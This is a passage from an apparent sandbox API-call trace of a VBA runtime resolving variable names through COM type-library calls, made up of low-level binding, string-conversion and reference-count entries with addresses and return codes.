ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0068.802] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a60d96 | out: _Dst=0x144ec0) returned 0x0 [0068.802] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0068.803] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0068.803] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.803] IUnknown:Release (This=0x665ba50) returned 0xd [0068.803] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.803] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.803] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.803] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.803] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.803] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.803] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.803] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.803] IUnknown:Release (This=0x665ba50) returned 0xd [0068.803] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.803] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.803] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.803] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.803] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.803] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.803] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.803] IUnknown:Release (This=0x665ba50) returned 0xd [0068.803] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.803] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.803] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.803] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.803] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.803] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.804] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.804] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.804] IUnknown:Release (This=0x665ba50) returned 0xd [0068.804] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.804] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.804] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.804] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.804] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.804] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.804] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.804] IUnknown:Release (This=0x665ba50) returned 0xd [0068.804] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.804] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.804] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.804] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.804] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.804] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.804] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.804] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.804] IUnknown:Release (This=0x665ba50) returned 0xd [0068.804] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.804] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.804] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.804] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.804] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.804] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.804] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.804] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.805] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.805] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.805] IUnknown:Release (This=0x665ba50) returned 0xd [0068.805] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.805] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.805] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.805] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.805] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.805] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.805] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.805] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.805] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.805] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.805] IUnknown:Release (This=0x665ba50) returned 0xd [0068.805] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.805] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.805] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60cf2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wAkUkA") returned 7 [0068.805] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wAkUkA", lHashVal=0x1057f1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60cf2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wAkUkA") returned 7 [0068.805] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wAkUkA", lHashVal=0x1057f1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60cf2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wAkUkA") returned 7 [0068.805] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wAkUkA", lHashVal=0x1057f1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.806] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wAkUkA") returned 0x1057f1 [0068.806] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="wAkUkA" | out: _Dst="wAkUkA") returned 0x0 [0068.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="wAkUkA") returned 7 [0068.806] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.806] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wAkUkA", lHashVal=0x1057f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.806] IUnknown:Release (This=0x665ba50) returned 0xd [0068.806] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.806] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wAkUkA", lHashVal=0x1057f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.806] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.806] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.806] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wAkUkA", lHashVal=0x1057f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.806] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.806] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.806] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wAkUkA", lHashVal=0x1057f1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.806] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60cf2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wAkUkA") returned 7 [0068.806] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wAkUkA", lHashVal=0x1057f1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.806] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.806] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a60cf2 | out: _Dst=0x67c2d40) returned 0x0 [0068.806] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wAkUkA") returned 0x10d29a [0068.806] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_wAkUkA" | out: _Dst="_B_var_wAkUkA") returned 0x0 [0068.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_wAkUkA") returned 14 [0068.806] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.806] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wAkUkA", lHashVal=0x10d29a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.806] IUnknown:Release (This=0x665ba50) returned 0xd [0068.806] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.806] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wAkUkA", lHashVal=0x10d29a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.806] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.806] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.806] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wAkUkA", lHashVal=0x10d29a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.806] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.806] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.807] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wAkUkA", lHashVal=0x10d29a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.807] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.807] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.807] IUnknown:Release (This=0x665ba50) returned 0xd [0068.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc26ea, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_wAkUkA") returned 14 [0068.807] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wAkUkA", lHashVal=0x10d29a, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x6b005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x6b005500000000, pDummy=0x0) returned 0x0 [0068.807] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a60cf2 | out: _Dst=0x144ec0) returned 0x0 [0068.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60dea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HUAGAo") returned 7 [0068.807] ITypeComp:RemoteBind (in: This=0x665ba60, szName="HUAGAo", lHashVal=0x107b9f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60dea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HUAGAo") returned 7 [0068.807] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="HUAGAo", lHashVal=0x107b9f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60dea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HUAGAo") returned 7 [0068.807] ITypeComp:RemoteBind (in: This=0x665bd30, szName="HUAGAo", lHashVal=0x107b9f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.807] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HUAGAo") returned 0x107b9f [0068.807] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="HUAGAo" | out: _Dst="HUAGAo") returned 0x0 [0068.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="HUAGAo") returned 7 [0068.807] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.807] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="HUAGAo", lHashVal=0x107b9f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.807] IUnknown:Release (This=0x665ba50) returned 0xd [0068.807] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.807] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="HUAGAo", lHashVal=0x107b9f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.807] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.807] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.807] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="HUAGAo", lHashVal=0x107b9f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.808] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.808] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.808] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="HUAGAo", lHashVal=0x107b9f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.808] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60dea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HUAGAo") returned 7 [0068.808] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="HUAGAo", lHashVal=0x107b9f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.808] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.808] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a60dea | out: _Dst=0x67c2d40) returned 0x0 [0068.808] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_HUAGAo") returned 0x10f648 [0068.808] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_HUAGAo" | out: _Dst="_B_var_HUAGAo") returned 0x0 [0068.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_HUAGAo") returned 14 [0068.808] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.808] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_HUAGAo", lHashVal=0x10f648, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.808] IUnknown:Release (This=0x665ba50) returned 0xd [0068.808] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.808] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_HUAGAo", lHashVal=0x10f648, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.808] 